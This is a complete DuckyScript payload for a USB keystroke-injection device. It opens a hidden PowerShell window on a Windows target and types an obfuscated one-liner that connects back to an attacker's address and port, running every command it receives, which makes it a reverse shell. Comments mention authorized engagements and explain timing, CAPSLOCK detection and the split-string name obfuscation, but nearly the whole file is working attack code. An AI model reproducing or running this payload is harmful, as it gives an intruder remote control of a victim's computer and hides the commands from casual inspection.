REM ReverseDucky
REM Version 2.0
REM OS: Windows / Linux(?) (Not tested with Powershell on Linux)
REM Author: 0iphor13
REM Requirement: DuckyScript 3.0

REM Purpose: opens a plain TCP connection from the target back to ADDRESS:PORT
REM and pipes every chunk received over it through Invoke-Expression, returning
REM stdout and stderr (2>&1) followed by a "Ducky@PS <cwd>> " prompt. The loop
REM ends when the peer closes the socket (Read returns 0), then the client is
REM closed and the PowerShell process exits.
REM
REM Security notes (for authorized engagements only):
REM - The session is unencrypted and unauthenticated: the script applies no TLS
REM   and no shared secret, so anyone on the network path can read the session
REM   or inject commands, and the listener will accept any inbound connection.
REM - Cmdlet and type names are typed as split/mixed-case strings. This only
REM   keeps the literal names out of the static command text; do not rely on
REM   it to evade script-block logging or AMSI on the target.
REM - The CAPSLOCK press at the very end only shows that the command line was
REM   typed and submitted; it does NOT confirm the connection succeeded, and it
REM   leaves CAPS LOCK enabled on the target for the user to notice.

REM Define the attacker IP and PORT in the DEFINE ADDRESS / DEFINE PORT lines below
REM DON'T FORGET TO START LISTENER (bound to PORT) before plugging the device in

REM Extension DETECT_READY by Korben for best and fastest deployment
EXTENSION DETECT_READY
REM VERSION 1.0

REM USAGE:
REM Extension runs inline (here)
REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
REM boot delay

REM TARGETS:
REM Any system that reflects CAPSLOCK will detect minimum required delay
REM Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
REM (ITERATION_LIMIT * RESPONSE_DELAY = 120 * 25ms)
REM NOTE(review): on a host that processes the keystrokes but never reports
REM LED state, the loop presses CAPSLOCK 120 times and the trailing press makes
REM 121 (odd), so CAPS LOCK may be left ON when the payload is typed. PowerShell
REM names are case-insensitive, but string literals would be inverted -- confirm
REM on the target.

REM CONFIGURATION:
DEFINE RESPONSE_DELAY 25
DEFINE ITERATION_LIMIT 120

REM $C counts presses; the loop exits as soon as the host reports CAPSLOCK on,
REM or after ITERATION_LIMIT presses.
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < ITERATION_LIMIT))
CAPSLOCK
DELAY RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
REM Toggle CAPSLOCK back off once the host has responded.
CAPSLOCK
END_EXTENSION

REM Define the attackers IP & Port
REM ADDRESS and PORT are substituted into the STRINGLN payload text below; keep
REM the quotes around ADDRESS so it lands in PowerShell as a string literal.
DEFINE ADDRESS '0.0.0.0'
DEFINE PORT 4444

DELAY 1500
REM Win+R opens the Run dialog, which launches PowerShell with no profile
REM (-NoP), non-interactive (-NonI) and a hidden window (-w h).
GUI r
DELAY 500
STRINGLN powershell -NoP -NonI -w h
REM NOTE(review): 500ms may be too short for PowerShell to start on a slow or
REM cold host; characters typed before it is ready are lost. Raise this delay
REM if the shell never calls back.
DELAY 500
REM One-liner: connect to ADDRESS:PORT, then until Read returns 0: bytes ->
REM ASCII -> iex (stderr merged) -> Out-String, append the prompt, write back.
REM $0LVhbQ and $0lvHBq are the same variable (PowerShell is case-insensitive).
REM NOTE(review): the PowerShell text reuses the name $C; it is assumed the
REM DuckyScript compiler does not interpolate the VAR $C above into STRINGLN --
REM verify after compiling.
STRINGLN $0LVhbQ=[TyPE]('tExT'+'.enCOD'+'InG');$C=.('New'+'-Obj'+'ect') System.Net.Sockets.TCPClient( ADDRESS , PORT );$S=$C.GetStream();[byte[]]$b=0..65535|&('%'){0};while(($i=$S.Read($b,0,$b.Length))-ne 0){;$d=(&('New'+'-Ob'+'ject') -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$X=(&('ie'+'x') $d 2>&1 | .('Out'+'-St'+'ring'));$Z=$X+'Ducky@PS '+(&('g'+'l'))+'> ';$sbt=($0lvHBq::ASCII).GetBytes($Z);$S.Write($sbt,0,$sbt.Length);$S.Flush()};$C.Close();exit
REM Signal keystroke delivery to the operator (leaves CAPS LOCK on, see notes).
CAPSLOCK
|